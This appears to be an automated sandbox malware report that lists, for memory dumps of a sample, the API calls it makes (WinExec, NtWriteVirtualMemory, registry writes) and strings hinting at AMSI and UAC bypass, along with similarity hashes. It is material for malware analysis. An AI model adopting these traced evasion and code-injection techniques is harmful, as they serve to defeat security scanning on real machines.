• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
APIs
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
  • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
• WinExec.KERNEL32(?,?), ref: 02B08624
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
APIs
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
  • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
• WinExec.KERNEL32(?,?), ref: 02B08624
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B05D74,?,?,02B03900,00000001), ref: 02B05C88
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B05D74,?,?,02B03900,00000001), ref: 02B05CB6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B03900,02B05CF6,00000000,02B05D74,?,?,02B03900), ref: 02AF7DAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B03900,02B05D11,00000000,02B05D74,?,?,02B03900,00000001), ref: 02AF7FB7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,02B05D74,?,?,02B03900,00000001), ref: 02B05D1B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02AFC3D9,00000000,02AFC433), ref: 02AFA797
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 503785936-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8ddb4ec1b2c6a3f9a16e309c987a23e0ca8debb5f754ba66ea198a6fa3457464
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b726a2607612dbd9d962bb1ecf7ca78fb87d2b9b9e201f1735b30c1bf0b375e4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ddb4ec1b2c6a3f9a16e309c987a23e0ca8debb5f754ba66ea198a6fa3457464
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F319670A406099FDB51EFE4C981BDEBBF6AF08700F908565E604AB790DB795D048FA1
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02C6BA58), ref: 02B0F258
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F290
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(0000087C,0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F29B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d8a9b2a8d28382a95da1a5c6e05ae115c4525156650d040ae02492e4f3bfb4f3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c72e5bb483464bf5474353ffa537f283916efb0a95f3283b472145ab3a7a406c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8a9b2a8d28382a95da1a5c6e05ae115c4525156650d040ae02492e4f3bfb4f3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2611FB71780204AFEB41EFA9DA85A9A7BEDEB08700B404561FA14E7650DE39EE408F54
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02C6BA58), ref: 02B0F258
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F290
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(0000087C,0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F29B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: 7097c0083940599aa171c6d52bed8e01f8d31c5cb693e751b21b46740fe30eab
• Instruction ID: 27b29a22da95398d55e8eb4756a76025eb16e239f7561a7dd9c4c63b533ed6b1
• Opcode Fuzzy Hash: 7097c0083940599aa171c6d52bed8e01f8d31c5cb693e751b21b46740fe30eab
• Instruction Fuzzy Hash: 1311FB71780204AFDB41EFA9DA85A9A7BADEB08700B404561FA14E7650DE39EE408F54
APIs
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 41465167b4fb9c6f6bb2a6ce2d3585ada07d76a6f0ae9f70383d5ded69f0c0c4
• Instruction ID: 35d4dad4655c1892fff4cf3c9b7ba69cb399c079cad199e15c1c9c9017037e2b
• Opcode Fuzzy Hash: 41465167b4fb9c6f6bb2a6ce2d3585ada07d76a6f0ae9f70383d5ded69f0c0c4
• Instruction Fuzzy Hash: 57F08C21748218C79AA0ABFA8BC866D66AA5F4075070016B6B7069B171CF6CCC49CB62
APIs
• SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
• SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4D5B
• SysFreeString.OLEAUT32(00000000), ref: 02AF4D6D
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
• Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
• Instruction ID: 9b89eac7fcfd5926e2431ba6af78d562998cf5d254b09dee2956cacd159b55b6
• Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
• Instruction Fuzzy Hash: 80E0C2B82012019EFF942FE18E80B37732AAFC1740B5480A8BB00CA010DF3DC441AD38
APIs
• SysFreeString.OLEAUT32(?), ref: 02B073DA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
• Opcode ID: 58ad382747aa1439b0df8d3b4d92a36aeb0e28cfd34436b39323762a65539db2
• Instruction ID: 5e00211259aaede79a66b960136b3a11b2a883ad522d8f8130ee8ea0a9bba6d4
• Opcode Fuzzy Hash: 58ad382747aa1439b0df8d3b4d92a36aeb0e28cfd34436b39323762a65539db2
• Instruction Fuzzy Hash: 69B1C174A016089FDB15CF99D5C0A9DFBF2FF89314F2481A9E945AB3A0DB30A845DF50
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 02AFE781
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFE364: VariantClear.OLEAUT32(?), ref: 02AFE373
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B083C2), ref: 02B083A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1478290883-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02B06DB9,?,?,?,00000000), ref: 02B06D99
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4C60: SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4225568880-0
APIs
• GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AF5886
  • Part of subcall function 02AF5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5AE8
  • Part of subcall function 02AF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B06
  • Part of subcall function 02AF5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B24
  • Part of subcall function 02AF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02AF5B42
  • Part of subcall function 02AF5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02AF5B8B
  • Part of subcall function 02AF5ACC: RegQueryValueExA.ADVAPI32(?,02AF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001), ref: 02AF5BA9
  • Part of subcall function 02AF5ACC: RegCloseKey.ADVAPI32(?,02AF5BD8,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02AF5BCB
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02AF7DF4
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02B1356F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,Initialize), ref: 02AF7E8B
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,02B1C350,00000000,00000001), ref: 02B1C36C
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Eventtime
